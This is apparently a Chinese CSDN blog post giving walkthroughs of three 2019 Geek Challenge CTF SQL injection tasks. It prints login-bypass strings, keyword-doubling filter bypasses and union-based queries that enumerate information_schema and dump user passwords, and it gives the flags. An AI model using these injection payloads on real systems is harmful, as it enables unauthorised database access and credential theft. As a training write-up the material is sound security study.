极客大挑战-SQL

最新推荐文章于 2024-07-20 18:21:04 发布
最新推荐文章于 2024-07-20 18:21:04 发布
阅读量208 收藏
点赞数 5
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63963927/article/details/134183393
版权

2019 Easy SQL

万能密码:

 

2019 Baby SQL

输入账号密码试试

 

整一手万能密码 ?username=1' or 1=1#&password=1

我们先闭合前面的,然后看看报错吗?果然报错了

 

 我们的or去哪里了,于是我们进一步测试,发现过滤了好多关键字,比如or, select,where, union。应该是用函数replace给我们替换成了空白字符

知道了这样,我们就进行绕过,于是拼接字符,无法用order by 1来判断字段个数,我们只有使用联合查询看他是否能查出来,应该列数不太多,于是我们构造

1' uunionnion sselectelect 1,2#

 

  于是我们发现出现错误,所以猜测列数错误,于是我们再加一列继续构造

1' uunionnion sselectelect 1,2,3#

这次显示出两个显示位,有显示位 

  2.'3'就是我们的显示位,于是我们就在这两个地方随便选择显示查出数据的地方

接下来我们开始查当前库

1' uunionnion sselectelect 1,2,database()#

 

 

然后查表 

1' uunionnion sselectelect 1,2,group_concat(table_name)ffromrom infoorrmation_schema.tables wwherehere table_schema=database()#

 然后我们查出来两张表b4bsql和geekuser

于是我们再继续对表进行查列字段

1' uunionnion sselectelect 1,2,group_concat(column_name)ffromrom infoorrmation_schema.columns wwherehere table_name='b4bsql'#

 

查出三个列字段:id,username,password

 

 于是我们就开始爆数据 

1' uunionnion sselectelect 1,2,group_concat(passwoorrd)ffromrom b4bsql#

 

flag:flag{30efe617-40d5-4840-a848-c54c84940527}

2019 Love SQL

发现登录框,可能是万能密码登录,我们试一下:
在登录框中输入:

账号:1' or 1=1#
密码:1   (随便输)

跳转到了check.php页面。并得到了用户名和密码 

尝试密码md5解密失败,还是回到注入的思路上,查询字段数:

1' order by 4#

 

可知共3个字段。用union查询测试注入点(回显点位):

1' union select 1,2,3#

 

 得到回显点位为2和3

查表:

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#

 

爆出这两个表,我们试一下l0ve1ysq1这个表:

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'#

 得到这三个字段,爆数据:

1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#

得到flag:flag{3f696fcc-86fc-4039-acca-0bb36a937b48} 

拾 味
关注
  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SQL实训总结.docx
07-30
实训期间,不仅学习了SQL和C#的结合应用,也体验到了编程的乐趣和挑战,认识到自己在编程技能上的不足,明确了未来学习的方向。实训课提供了一个将理论知识转化为实践的平台,为今后的学习和职业生涯奠定了坚实的...
ISCC2019个人挑战赛题目练习
05-05
3. **Web安全**:可能涉及SQL注入、XSS攻击、CSRF漏洞等,参赛者需要找出并修复网站的安全弱点。 4. **网络嗅探**:可能需要使用工具如Wireshark捕获并分析网络流量,识别异常行为。 5. **漏洞分析**:分析软件或...
buuctf 极客挑战sql
l181954187的博客
03-31 240
所以要使用单引号字符型万能密码1' or 1=1 # 密码随便,#号是注释符会把密码注释掉,然后1=1恒为真所以就可以绕过得到flag。3.然后尝试使用万能账号,因为知道SQL语句闭合方式是单引号。进行SQL注入(万能密码/Hackbar)报错了,可知SQL语句闭合方式是单引号。便可以知道这个页面跟数据库发生了交互。则可知SQL语句闭合方式不是双引号。然后账号输1’,密码输123发现。先找到页面中有数据交互的地方。判断SQL语句的闭合方式。
极客挑战2019-SQL注入五题PW
cainsoftware的博客
09-23 1283
01、[极客挑战2019]EasysQL 02、[极客挑战2019]LovesQL 03、[极客挑战2019]BabysQL 04、[极客挑战2019]HardsQL 05、[极客挑战2019]FinalsQL Pass-01 第一题无须太多花里胡哨的直接就是万能密码 payload:admin' or 1=1 -- qwe Pass-02 题目提示 不在当前表 直接先用万能密码测试闭合 提示登录成功 说明闭合是没有问题的 那么下面就是判断其他...
极客挑战 2019】Easy,Love,Baby-SQL
nareku的博客
07-10 246
连环题!!嘿嘿嘿打开靶机 随便输输,得了? 进阶题来了嘿嘿嘿(用 sqlmap 是没有灵魂的哈哈哈) 按照套路,随便注注 试试万能密码,有回显 接下来用order by 1-99来判断一下字段数 试到4的时候出现报错 那么字段数就是3了,输入查询语句: 得到2,3两个回显点位 爆库: 得到库名为: geek 爆表: 得到两个表,第二个有flag的概率更大,那就看看第二个表吧,看看第二个表有什么字段 那么接下来就是看具体内容啦 一大串字符,一直往右到底就可以看到flag的字样啦 题目提示了过
极客挑战2019】love sql详解
kindyyy的博客
04-16 1499
这道题其实是最基本的sql注入类型,所以只要掌握最基础的注入知识很容易就可以得到flag 先打开题目,先用万能密码登陆一下 只是一个乱码啊,没什么用,就直接用sql注入了,先查询列数: 1' order by 3 # 有回显,那再尝试一下4? ' order by 4 # 那就只有3列,查询库名吧,直接上 ...
极客挑战2019】Baby SQL解题
Bird&Bird
10-25 2003
1、打开BUUCTF在线评测,选择web--->【极客挑战2019】Baby SQL。 2、首先采用万能密码试一下,出错了。 3、那使用普通注入试一下,报错了,从这里可以看出过滤了 union select 。 4、接着使用双写方式绕过过滤,试一下。 username=admin&password=123456' ununionion selselectect 1 %23 从结果上看,虽然也报错了,但提示不是sql语法错误,而且我们提供的查询字段数不对。 ..
极客挑战2019】LoveSQL解题
Bird&Bird
10-25 2011
1、打开靶机:BUUCTF在线评测,选择web---->【极客挑战2019】LoveSQL 打开被测试站点,是这个样子的,是上一题EasySQL的延续。 2、EasySQL那道题采用万能密码,我们也直接使用万能密码试一下,结果如下: 直接给出了密码。 使用正确的用户名和密码登录一下,结果还是 那使用MD5库碰撞一下,结果也没碰撞出来。 3、继续寻常注入吧。 爆破有多少列(字段数) username=admin&password=6ec1cab79005129..
极客挑战2019——baby sql
qq_44308327的博客
11-22 666
baby sql(注意双写绕过) 判断注入类型 既然是sql注入题,那就先判断注入的数据类型 payload: ?username=admin&password=1 payload: ?username=admin&password=2-1 //判断页面是否发生变化,如有变化则为字符型注入,反之则为整型注入 无变化,所以为整型注入 判断回显位 payload:?username=admin&password=1' order by 3%23 ...
极客挑战 Easy SQL 1
qq_51802152的博客
12-23 166
超级简单的一个web 注入题
Buuctf-Web-[极客挑战 2019]EasySQL 1 题解及思路总结
m0_62239233的博客
09-16 8872
SQL注入。
OceanBase:云时代企业级分布式数据库的技术挑战.pdf
08-18
【OceanBase:云时代企业级分布式数据库的技术挑战】 在当今的云时代,企业级数据库面临着巨大的挑战,尤其是在扩展性和成本方面。传统的单机数据库由于其不可扩展性,往往需要高昂的维护费用。为了应对这一问题,...
基于java的智慧养老院系统的设计与实现源码+项目说明+sql数据库.zip
10-27
基于java的智慧养老院系统的设计与实现源码+项目说明+sql数据库.zip 基本功能 涉及到的技术:SSM、mysql 随着我国逐渐进入老龄化社会,全社会都在关注老人赡养问题。其中因人口的频繁流动,越来越多的老人选择去...
毕业设计 JSP+SQL网上书店售书系统(源代码+论文+答辩PPT).zip
04-30
6. **项目挑战与解决方案**:分享遇到的问题及解决办法。 7. **未来展望**:提出系统可改进或扩展的方向。 总结,这个毕业设计项目不仅展示了JSP动态网页开发和SQL数据库管理的能力,还涵盖了软件工程的基本理念和...
SQL Server开发新纪元:用SQL Server Data Tools (SSDT) 打造数据库
最新发布
2401_85341950的博客
07-20 1006
SSDT 是一个基于Visual Studio的开发工具,它集成了对SQL Server数据库项目的支持。SSDT 提供了可视化的设计界面,以及对数据库版本控制和自动化测试的支持。
SQL执行流程、SQL执行计划、SQL优化
风中的默默
07-19 448
返回两个表中的匹配行。返回左表中的所有记录以及右表中的匹配记录。返回右表中的所有记录以及左表中的匹配记录。返回左侧或右侧表中有匹配的所有记录。
【MySQL】根据binlog日志获取回滚sql的一个开发思路
weixin_45385457的博客
07-19 509
不同客户端之间会交替追加在 binlog 中,需要通过 👆的 binlog 匹配流程来控制匹配。行,需要再次寻找 thread_id 相同的行,匹配到后执行上一个流程。在 binlog 中的线程 ID 记录为 thread_id。一个线程执行多个 sql 回滚到同一个文件可能带来的问题。对应 binlog 日志中的 thread_id=指定 mysql 客户端 开始时间和结束时间。打开 mysql 客户端 开始时间。关闭 mysql 客户端 结束时间。先匹配 thread_id 相同的。
SQL Server报告服务的艺术:在SSRS中打造专业报告
2401_85760095的博客
07-20 1012
SQL Server Reporting Services是一个全面的报告解决方案,它允许从各种数据源生成复杂的交互式和移动友好的报告。SSRS包括一个集成的开发环境,用于设计报告,以及一个部署环境,用于发布和共享报告。
极客挑战 2019]EasySQL
09-03
EasySQL极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值